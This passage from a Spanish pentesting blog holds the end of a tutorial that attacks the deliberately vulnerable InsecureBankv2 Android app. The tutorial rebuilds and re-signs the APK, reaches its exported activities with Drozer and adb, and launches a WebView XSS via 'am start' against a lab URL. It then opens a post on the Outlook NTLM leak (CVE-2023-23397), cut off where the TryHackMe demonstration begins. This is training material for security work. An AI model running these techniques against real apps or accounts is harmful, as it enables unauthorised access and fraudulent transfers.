style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7bbNEvr4FsFojK9K4Jm5gY0R0MRR2nhE-_MG0PzbvRakQTXpGuwu3FgRyIfoqZYAlBZS0LlGO-7M8x-2_id5TsoqDkpAdFjNGxp3Mo3AO12MqMA-1yO5i9ZIqXp3ZPm5-ZB0dQ_F-yfA9J61nJLIh3m5bJh2anFyKP3DkBPEOg9MFoZ916evoW4yVyqL7/s657/2023-12-05%2012_28_20-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="232" data-original-width="657" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7bbNEvr4FsFojK9K4Jm5gY0R0MRR2nhE-_MG0PzbvRakQTXpGuwu3FgRyIfoqZYAlBZS0LlGO-7M8x-2_id5TsoqDkpAdFjNGxp3Mo3AO12MqMA-1yO5i9ZIqXp3ZPm5-ZB0dQ_F-yfA9J61nJLIh3m5bJh2anFyKP3DkBPEOg9MFoZ916evoW4yVyqL7/w640-h226/2023-12-05%2012_28_20-Mobunty.docx.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una vez que tengamos la APK decompilada, procedemos a modificar el AndroidManifest.xml (exported=”false”):</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9iWYOvHIE75u0SOGdVTT4M-ZvgDBN7248IbkoWAc7vPV3yLy-W4IfryJqKjcNEUmBA0AJGa9j3rsopd0BDh0pNsOvyAYqjth84sKXQjEGKpraBG-f7Xb1fUDfYXMAtoJKULQrMQwpDeTU8DGxkpeLk4TB-KZJ2d_cKhAJZNH4QQWMyofBtI410ExhmTby/s666/2023-12-05%2012_28_29-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="58" data-original-width="666" height="56" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9iWYOvHIE75u0SOGdVTT4M-ZvgDBN7248IbkoWAc7vPV3yLy-W4IfryJqKjcNEUmBA0AJGa9j3rsopd0BDh0pNsOvyAYqjth84sKXQjEGKpraBG-f7Xb1fUDfYXMAtoJKULQrMQwpDeTU8DGxkpeLk4TB-KZJ2d_cKhAJZNH4QQWMyofBtI410ExhmTby/w640-h56/2023-12-05%2012_28_29-Mobunty.docx.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Después de modificar la aplicación, tenemos que compilarla:</span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span style="font-family: courier;">Apktool b insecureBank-apktool –o insecureBank.apk</span></div><div style="text-align: justify;"><br /></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPQof1c_hSaDiIlJmMBetLpWUwStCpZZHkokDpKRwxj51PZPV1Oo3O-XVAVsWbZkolYoHPN1J0OryMjrzhH1Sz6muLEGUKkeBfhFtfwOu5ZobYAlEAagojaiqAstuExCRzfFYB8ZKSRiaeFUXriNIM6_ebzOqLOEQ0poXausDIoi3EOiy1ZzdZSiHvMdCN/s598/2023-12-05%2012_28_43-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="178" data-original-width="598" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPQof1c_hSaDiIlJmMBetLpWUwStCpZZHkokDpKRwxj51PZPV1Oo3O-XVAVsWbZkolYoHPN1J0OryMjrzhH1Sz6muLEGUKkeBfhFtfwOu5ZobYAlEAagojaiqAstuExCRzfFYB8ZKSRiaeFUXriNIM6_ebzOqLOEQ0poXausDIoi3EOiy1ZzdZSiHvMdCN/w640-h190/2023-12-05%2012_28_43-Mobunty.docx.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Para poder instalar la aplicación es necesario firmar la aplicación, en este caso lo haremos mediante un certificado auto firmado (este certificado no está aceptado en los market de aplicaciones), pero para este ejemplo nos vale.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Generamos certificado:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: courier;">keytool -genkey -v -keystore my-release-key.keystore -alias insecureBank-no-gpu -keyalg RSA -keysize 2048 -validity 10000</span></div><div style="text-align: justify;"><br /></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu21jNTWwoblt1Ia1_LNfWF4Uh_-WR3ttwg4hRfC6V_U5asltOFHsaPECNijitJe-hM3wfa5tzfKeTlHBz9KtRCO4wGlIkeBt-tLpZCw0RBkpqAD9C-izUWq5gJpISEuF80i4gC5i_no-HF02b1GGr5ktbqt0pkMbyjfCOl-4mksM9hyphenhyphengenL44SEVRrGQ6/s672/2023-12-05%2012_28_55-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="58" data-original-width="672" height="56" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu21jNTWwoblt1Ia1_LNfWF4Uh_-WR3ttwg4hRfC6V_U5asltOFHsaPECNijitJe-hM3wfa5tzfKeTlHBz9KtRCO4wGlIkeBt-tLpZCw0RBkpqAD9C-izUWq5gJpISEuF80i4gC5i_no-HF02b1GGr5ktbqt0pkMbyjfCOl-4mksM9hyphenhyphengenL44SEVRrGQ6/w640-h56/2023-12-05%2012_28_55-Mobunty.docx.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Firmamos la apk con el certificado anterior:</span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span style="font-family: courier;">jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore insecureBank.apk insecureBank-no-gpu</span></div><div style="text-align: justify;"><br /></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho6sODeG8HwQDUxz3eCSoSJtks-YL-f2LoSxOMxZ-MnHiNckWcXdlyI45vwPwqOYpdDhvfxMKJ-X3bUj704MTjqkbkT4YRftQ_1eTti6IaRJSg0IF4zE6157tv58wVUoWTbr65uKVUqjTYFKlLA5w5KxFdVkj_cVE6Qj4h4vAKELE5nkuFeasx1xPJs33m/s675/2023-12-05%2012_29_06-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="109" data-original-width="675" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho6sODeG8HwQDUxz3eCSoSJtks-YL-f2LoSxOMxZ-MnHiNckWcXdlyI45vwPwqOYpdDhvfxMKJ-X3bUj704MTjqkbkT4YRftQ_1eTti6IaRJSg0IF4zE6157tv58wVUoWTbr65uKVUqjTYFKlLA5w5KxFdVkj_cVE6Qj4h4vAKELE5nkuFeasx1xPJs33m/w640-h104/2023-12-05%2012_29_06-Mobunty.docx.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Instalamos la nueva aplicación en el dispositivo (desinstalando previamente la versión anterior).</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">De nuevo usaremos Drozer para detectar actividades vulnerables, se puede observar que ya no está exportada la actividad PostLogin.</span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span style="font-family: courier;">Sudo docker run –net host –it withsecurelabs/drozer console connect –server 172.16.20.75</span></div><div style="text-align: justify;"><br /></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9kRRzM37AKSLVWFtRrcgOLH67xxZyA6p97h8n7y9ScN9fpfuYh9Pi2wsiVNkf_X4htMnJUcaYoidtSnFmMBW8ykqhi5UFXSTDGG5SWDqB8QTNs1hmOXpb8NvV0RNBL-FTcDxTR_ogX1SWRcWXybWNJNK99p5GlTW6b_buZapoXnVaYCp3puD0V4x1UwaU/s666/2023-12-05%2012_29_21-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="425" data-original-width="666" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9kRRzM37AKSLVWFtRrcgOLH67xxZyA6p97h8n7y9ScN9fpfuYh9Pi2wsiVNkf_X4htMnJUcaYoidtSnFmMBW8ykqhi5UFXSTDGG5SWDqB8QTNs1hmOXpb8NvV0RNBL-FTcDxTR_ogX1SWRcWXybWNJNK99p5GlTW6b_buZapoXnVaYCp3puD0V4x1UwaU/w640-h408/2023-12-05%2012_29_21-Mobunty.docx.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Para comprobar si realmente hemos mitigado esta vulnerabilidad vamos a probar invocar la actividad con adb.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Se puede observar que con el atributo exported= “false” ya no podemos acceder a la actividad PostLogin.</span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span style="font-family: courier;">Adb –s 172.16.20.75:43139 shell</span></div><div style="text-align: justify;"><br /></div></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitt-SryTdT6WzbwancMAo1KUclhpqCTDqmKNZ9YJg2q1HVkQ-XwC24W5Xu0lvwS2I4wfuaK25oCUwB3h9hLDMErpDH6SEh3Nyfx4wtFBwjJwwT0xmeIVS9S2Z85f96IU05OpRHWZd86HjeJMoxxRQrtJfl1JcR6sD_bHtsYmp_R1d1Hg8_qplUBX7oHrZl/s678/2023-12-05%2012_29_32-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="280" data-original-width="678" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitt-SryTdT6WzbwancMAo1KUclhpqCTDqmKNZ9YJg2q1HVkQ-XwC24W5Xu0lvwS2I4wfuaK25oCUwB3h9hLDMErpDH6SEh3Nyfx4wtFBwjJwwT0xmeIVS9S2Z85f96IU05OpRHWZd86HjeJMoxxRQrtJfl1JcR6sD_bHtsYmp_R1d1Hg8_qplUBX7oHrZl/w640-h264/2023-12-05%2012_29_32-Mobunty.docx.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Sin embargo, en el resultado mostrado por Drozer se puede ver más actividades vulnerables, por ejemplo, la actividad DoTransfer. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Procedemos a lanzar la dicha actividad, y vemos que, aunque ya no tengamos acceso a la actividad PostLogin, seguimos teniendo acceso a la actividad DoTransfer, ya que cada actividad en Android se gestiona de forma independiente, por lo tanto, a la hora de mitigar esta vulnerabilidad hay que tenerla en cuenta en todas las actividades.</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaAT7pqQ_nKh3viOTzPuNa79xSx-TK-E6AnLbLe79wyoSD42eAesRYIvUtinmX2SqsaG4phFx91EDDuq-TwwtS88Cdu471gpHY0EfFdIr-EosxyblYC9Ks46AUWZBgtZDlKkkA8vgrt2yIiaIbShz5_AEkm0P_qSne7zsBKzwS98rVru31KKY0_pjv5UX1/s484/2023-12-05%2012_29_49-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="279" data-original-width="484" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaAT7pqQ_nKh3viOTzPuNa79xSx-TK-E6AnLbLe79wyoSD42eAesRYIvUtinmX2SqsaG4phFx91EDDuq-TwwtS88Cdu471gpHY0EfFdIr-EosxyblYC9Ks46AUWZBgtZDlKkkA8vgrt2yIiaIbShz5_AEkm0P_qSne7zsBKzwS98rVru31KKY0_pjv5UX1/w640-h368/2023-12-05%2012_29_49-Mobunty.docx.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Esta última actividad nos lleva al panel de transferencias desde la cual podremos emitir una transferencia en nombre de otro usuario (si lo hubiera). </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Por otra parte, vamos a provechar las actividades exportables para atacar el componente WebView.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">WebView es un componente de Android que permite a los desarrolladore presente contenidos de web dentro de la aplicación, algo así como un navegador web embebido dentro de la app.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Si la actividad cuenta con Webview y JavaScript habilitado, podríamos aprovechar esto para ejecutar un XSS sobre esa misma actividad:</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo5rFADU4R8yBRaYpQDRkSrCL-gzHKmE8E702CwfHx-b41gu_w0orQggx5CbzqXVY28QAy2EvDZyRDFOVSvQotQkzicnGXNozsC-RXyEpUpVWwT_Nr-SKQKEJh3QsiDvalkdQvi06g6O-1Z5Qi_EddyRUMF2Ek0xrv9UuKYZuR1VI0H4V_LbF4OFyphDpE/s647/2023-12-05%2012_30_00-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="530" data-original-width="647" height="524" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo5rFADU4R8yBRaYpQDRkSrCL-gzHKmE8E702CwfHx-b41gu_w0orQggx5CbzqXVY28QAy2EvDZyRDFOVSvQotQkzicnGXNozsC-RXyEpUpVWwT_Nr-SKQKEJh3QsiDvalkdQvi06g6O-1Z5Qi_EddyRUMF2Ek0xrv9UuKYZuR1VI0H4V_LbF4OFyphDpE/w640-h524/2023-12-05%2012_30_00-Mobunty.docx.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Teniendo en cuenta esto, podemos invocar esta actividad pasándole una url vulnerable a ataques XSS.</span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span style="font-family: courier;">Am start –n com.tmh.vulnwebview/.SupportWebView --es support_url http://172.16.20.110:8080</span></div><div style="text-align: justify;"><br /></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipTpV4xzTjM_t6GmcJgboheZHfxlBvQlMaytgKXDIvkcTSmnJ9sWNwcOjiVCuwev-dSgF4q7wynU2d3q9qHTgjWku1zIJMguhoQxfUtQl0aifrV3n0WRy6Re1RU7YEyaFDaLSHFTWVMllsWd8In5Hoq0jiBAh33v30X2ugi591q9sV3ImCPq0G_pLi4_hc/s677/2023-12-05%2012_30_16-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="44" data-original-width="677" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipTpV4xzTjM_t6GmcJgboheZHfxlBvQlMaytgKXDIvkcTSmnJ9sWNwcOjiVCuwev-dSgF4q7wynU2d3q9qHTgjWku1zIJMguhoQxfUtQl0aifrV3n0WRy6Re1RU7YEyaFDaLSHFTWVMllsWd8In5Hoq0jiBAh33v30X2ugi591q9sV3ImCPq0G_pLi4_hc/w640-h42/2023-12-05%2012_30_16-Mobunty.docx.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Se puede observar en la siguiente imagen el resultado de la ejecución del XSS sobre la app:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_UEb1HomDBmSCREKpcp0tx8CEJgZIxB7TmOgM-s1BQrJi0ok2jJVBvra43jo6iOkWUYRSLezpOATPzEpLq-KXrODN77bFR-mxzz8WSITluzh6ubDHn0rMrrhKVX2GQQ-O1tn17rr6EcJeLpaojTt2z-GZKtUR3WizDOFQvOcldLr3SgYavswp2SyAqYM2/s548/2023-12-05%2012_30_25-Mobunty.docx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="548" data-original-width="462" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_UEb1HomDBmSCREKpcp0tx8CEJgZIxB7TmOgM-s1BQrJi0ok2jJVBvra43jo6iOkWUYRSLezpOATPzEpLq-KXrODN77bFR-mxzz8WSITluzh6ubDHn0rMrrhKVX2GQQ-O1tn17rr6EcJeLpaojTt2z-GZKtUR3WizDOFQvOcldLr3SgYavswp2SyAqYM2/w540-h640/2023-12-05%2012_30_25-Mobunty.docx.png" width="540" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Con esto comprobamos de que se puede replicar los mismos ataques de una página web en una aplicación con WebView. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Os recomendamos las siguientes aplicaciones vulnerables con las que podrás practicar los que acabáis de aprender:</span></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"><a href="https://github.com/dineshshetty/Android-InsecureBankv2">InsecureBankv2</a></span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><a href="https://github.com/0xArab/diva-apk-file">DivaAPK</a></span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><a href="https://github.com/B3nac/InjuredAndroid/releases">InjuredAndroid</a></span></li></ul><div><br /></div><div><span style="font-family: Barlow Semi Condensed;">Esperamos que os haya gustado esta segunda parte introductoria sobre pentesting de aplicaciones móviles sin morir en el intento. Si tenéis alguna duda, siempre podéis volver a repasar<a href="https://www.flu-project.com/2023/12/PentestingAplicacionesM.html"> la primera parte</a>.</span></div><div><br /></div><div><br /></div></div></div><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><div style="text-align: left;"><a href="https://www.linkedin.com/in/xuqiang-liu-xu-5456b9265/" style="background-color: white; box-sizing: border-box; color: #1e71b8; cursor: pointer; font-family: "Barlow Semi Condensed"; font-size: 16px; outline: none; text-align: right; text-decoration-line: none; transition: all 0.5s ease 0s;">Xuquiang Liu Xu</a><span style="background-color: white; color: #212529; font-family: "Barlow Semi Condensed"; font-size: 16px; text-align: right;">, Pentester Jr. at </span><a href="http://www.zerolynx.com/" style="background-color: white; box-sizing: border-box; color: #1e71b8; cursor: pointer; font-family: "Barlow Semi Condensed"; font-size: 16px; outline: none; text-align: right; text-decoration-line: none; transition: all 0.5s ease 0s;">Zerolynx</a><span style="background-color: white; color: #212529; font-family: "Barlow Semi Condensed"; font-size: 16px; text-align: right;"> y </span><a href="https://www.linkedin.com/in/alejandro-au%C3%B1%C3%B3n-le%C3%B3n-86820892/" style="background-color: white; box-sizing: border-box; color: #1e71b8; cursor: pointer; font-family: "Barlow Semi Condensed"; font-size: 16px; outline: none; text-align: right; text-decoration-line: none; transition: all 0.5s ease 0s;">Alejandro Auñón</a><span style="background-color: white; color: #212529; font-family: "Barlow Semi Condensed"; font-size: 16px; text-align: right;">, Offensive Security Analyst at </span><a href="http://www.zerolynx.com/es" style="background-color: white; box-sizing: border-box; color: #1e71b8; cursor: pointer; font-family: "Barlow Semi Condensed"; font-size: 16px; outline: none; text-align: right; text-decoration-line: none; transition: all 0.5s ease 0s;">Zerolynx</a><span style="background-color: white; color: #212529; font-family: "Barlow Semi Condensed"; font-size: 16px; text-align: right;">.</span></div></blockquote>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-30731536637123516422023-12-18T09:00:00.019+01:002023-12-18T10:46:22.879+01:00Analizando a fondo la vulnerabilidad Outlook NTLM leak (CVE-2023-23397)<p style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHlzFzkuWnVZYnEa20YZLW7lZRwcPs1T5tbVM1PkiOdAWYu_0m-zCisNglWUw5WGZAjFLJBJjSCl2KchuPRdWu8QLDZwLh3jpNF3iF-nPcxpsIO7zrLWNfhVfszBzfXhWOlFj4p8gSAB7cEaqzgoojo0mp4X8eaSoL8jZJQG43DDvFb25XBvH-oaWACiV0/s1920/Dise%C3%B1o%20sin%20t%C3%ADtulo%20(16).jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHlzFzkuWnVZYnEa20YZLW7lZRwcPs1T5tbVM1PkiOdAWYu_0m-zCisNglWUw5WGZAjFLJBJjSCl2KchuPRdWu8QLDZwLh3jpNF3iF-nPcxpsIO7zrLWNfhVfszBzfXhWOlFj4p8gSAB7cEaqzgoojo0mp4X8eaSoL8jZJQG43DDvFb25XBvH-oaWACiV0/w640-h360/Dise%C3%B1o%20sin%20t%C3%ADtulo%20(16).jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El pasado 14 de marzo de 2023, Microsoft publicó un parche de seguridad que corregía la vulnerabilidad CVE-2023-23397. Esta vulnerabilidad crítica (CVSS de 9.8) permitía al atacante elevar privilegios en los sistemas Windows mediante un exploit “zero click”, es decir, sin que el usuario tuviera que interactuar para activarlo.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El CVE-2023-23397 permitía al atacante enviar un correo electrónico con contenido malicioso a través de Outlook a una víctima, haciendo que esta se conectase automáticamente a una ruta UNC bajo el control del atacante y recibir el hash NTLM de la contraseña de la víctima, el cual permitiría poder autenticarse en un sistema y elevar privilegios.</span></p><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrv2vVCWKUharfT97ZUVcNbIbma5hZpmxPN-r4S2UvGM5vqr2IXEgu8JfXgSWyOBWUJET4rDHWDqetdlhDwuIkgm6PtgBQ4oF2mAejhhBU_RLTTZHIJa5b99eWUG242o1KXx8rXF45Y6URXVqX8tdHsIE04QfnYRbczd9gSQitAr2FZkhTxBXF5MZWxOQB/s1318/Imagen%201.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="266" data-original-width="1318" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrv2vVCWKUharfT97ZUVcNbIbma5hZpmxPN-r4S2UvGM5vqr2IXEgu8JfXgSWyOBWUJET4rDHWDqetdlhDwuIkgm6PtgBQ4oF2mAejhhBU_RLTTZHIJa5b99eWUG242o1KXx8rXF45Y6URXVqX8tdHsIE04QfnYRbczd9gSQitAr2FZkhTxBXF5MZWxOQB/w640-h130/Imagen%201.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Antes de continuar con la vulnerabilidad, vamos a explicar rápidamente que es un hash NTLM y por qué es tan importante. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">NTLM (NT LAN Manager) consiste en un conjunto de protocolos de autenticación que permite a los ordenadores y servidores verificarse entre sí. Básicamente, un hash NTLM es el formato criptográfico en el que se almacenan las contraseñas de usuario en sistemas Windows.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Este protocolo se realiza mediante un procedimiento de desafío/respuesta para llevar a cabo la autenticación del cliente y el servidor. Los pasos que se realizan son:</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">1.<span style="white-space: pre;"> </span>El cliente realiza una solicitud de autenticación a un servidor para un recurso al que desea acceder.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">2.<span style="white-space: pre;"> </span>El servidor envía un desafío al cliente, por lo que este deberá cifrar el desafío utilizando el hash de su contraseña.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">3.<span style="white-space: pre;"> </span>El cliente envía la respuesta encriptada al servidor, el cual contactará con el controlador de dominio para verificar si el encriptado es el correcto.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">4.<span style="white-space: pre;"> </span>Si la respuesta es válida, el servidor autentica al usuario y le permite el acceso. Si la respuesta falla, el servidor rechazará la autenticación y le solicitará nuevas credenciales.</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi406LoTW-XQArkjSpPinCUbi70Z2ZrmRqJ_KSLpLvfETgnoZ-qxbt-Chza5bww2EACfrniWxAjr-8aYRBQotnAQN7MF1zI34i9ONDHiY9wALJ5w2veji-QZnANyjzUV2upoFufLH4mH7R4wYKk-qfCHyAFkW2vGiyiIhWMn_1rpT38oIlgS-zgPjO7sMv0/s1239/Imagen%202.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="696" data-original-width="1239" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi406LoTW-XQArkjSpPinCUbi70Z2ZrmRqJ_KSLpLvfETgnoZ-qxbt-Chza5bww2EACfrniWxAjr-8aYRBQotnAQN7MF1zI34i9ONDHiY9wALJ5w2veji-QZnANyjzUV2upoFufLH4mH7R4wYKk-qfCHyAFkW2vGiyiIhWMn_1rpT38oIlgS-zgPjO7sMv0/w640-h360/Imagen%202.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Demostración</span></h3><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">A continuación, vamos a demostrar cómo se explotaba esta vulnerabilidad y, para ello, usaremos la máquina “Outlook NTLM Leak” de TryHackMe.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En primer lugar, crearemos un “responder” en nuestra máquina local, el cual nos permitirá escuchar los intentos de autenticación.</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a 